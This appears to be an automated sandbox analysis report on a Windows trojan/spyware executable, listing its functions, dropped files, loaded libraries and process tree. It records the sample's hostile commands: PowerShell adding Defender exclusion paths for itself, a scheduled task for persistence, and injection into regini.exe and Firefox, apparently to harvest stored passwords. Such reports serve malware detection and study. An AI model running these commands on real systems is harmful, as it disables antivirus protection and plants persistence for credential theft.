                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01494F4015_2_01494F40
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01462F2815_2_01462F28
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01440F3015_2_01440F30
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01412FC815_2_01412FC8
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0149EFA015_2_0149EFA0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01420E5915_2_01420E59
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01432E9015_2_01432E90
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0145516C15_2_0145516C
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0140F17215_2_0140F172
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142B1B015_2_0142B1B0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0140D34C15_2_0140D34C
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014233F315_2_014233F3
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0143B2C015_2_0143B2C0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0143D2F015_2_0143D2F0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014252A015_2_014252A0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0141146015_2_01411460
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014674E015_2_014674E0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142349715_2_01423497
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142B73015_2_0142B730
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142995015_2_01429950
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0143B95015_2_0143B950
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142599015_2_01425990
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0148D80015_2_0148D800
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014238E015_2_014238E0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01495BF015_2_01495BF0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0145DBF915_2_0145DBF9
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0143FB8015_2_0143FB80
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01493A6C15_2_01493A6C
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01423D4015_2_01423D40
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0143FDC015_2_0143FDC0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01439C2015_2_01439C20
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01499C3215_2_01499C32
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01421F9215_2_01421F92
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01429EB015_2_01429EB0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0042EEA315_2_0042EEA3
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_03311AAA16_2_03311AAA
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0330B2EA16_2_0330B2EA
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_033092DA16_2_033092DA
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0332A0AA16_2_0332A0AA
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_033138AE16_2_033138AE
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0330B0C116_2_0330B0C1
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0330B0CA16_2_0330B0CA
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0330942A16_2_0330942A
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0330941E16_2_0330941E
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: String function: 0148EA12 appears 37 times
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: String function: 01467E54 appears 97 times
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: String function: 0120F290 appears 105 times
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: String function: 011FEA12 appears 86 times
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: String function: 0117B970 appears 278 times
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: String function: 011D7E54 appears 102 times
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: String function: 011C5130 appears 58 times
                Source: C6Abn5cBei.exe, 00000000.00000002.1526527209.0000000005778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevpxg.exe6 vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000000.00000002.1528650995.0000000006A50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000000.00000002.1504108330.0000000002668000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000000.00000000.1430230994.00000000001FC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevpxg.exe6 vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000000.00000002.1508043916.0000000003629000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000000.00000002.1501916499.000000000077E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000000.00000002.1526120634.0000000004D90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000009.00000002.1874594973.0000000000C28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREGINI.EXEj% vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000009.00000002.1875207587.000000000127D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exeBinary or memory string: OriginalFilenamevpxg.exe6 vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C6Abn5cBei.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: zdDlscHlw.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@4/4
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeFile created: C:\Users\user\AppData\Roaming\zdDlscHlw.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3528:120:WilError_03
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE61C.tmpJump to behavior
                Source: C6Abn5cBei.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C6Abn5cBei.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: regini.exe, 00000011.00000003.2074623677.0000000003420000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000003.2065344002.0000000003415000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2686703437.0000000003443000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000003.2065140297.00000000033F4000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2686703437.0000000003415000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C6Abn5cBei.exeReversingLabs: Detection: 63%
                Source: C6Abn5cBei.exeVirustotal: Detection: 65%
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeFile read: C:\Users\user\Desktop\C6Abn5cBei.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\C6Abn5cBei.exe "C:\Users\user\Desktop\C6Abn5cBei.exe"
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zdDlscHlw.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Users\user\Desktop\C6Abn5cBei.exe "C:\Users\user\Desktop\C6Abn5cBei.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\zdDlscHlw.exe C:\Users\user\AppData\Roaming\zdDlscHlw.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmp175E.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess created: C:\Users\user\AppData\Roaming\zdDlscHlw.exe "C:\Users\user\AppData\Roaming\zdDlscHlw.exe"
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe"Jump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zdDlscHlw.exe"Jump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Users\user\Desktop\C6Abn5cBei.exe "C:\Users\user\Desktop\C6Abn5cBei.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmp175E.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess created: C:\Users\user\AppData\Roaming\zdDlscHlw.exe "C:\Users\user\AppData\Roaming\zdDlscHlw.exe"Jump to behavior
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
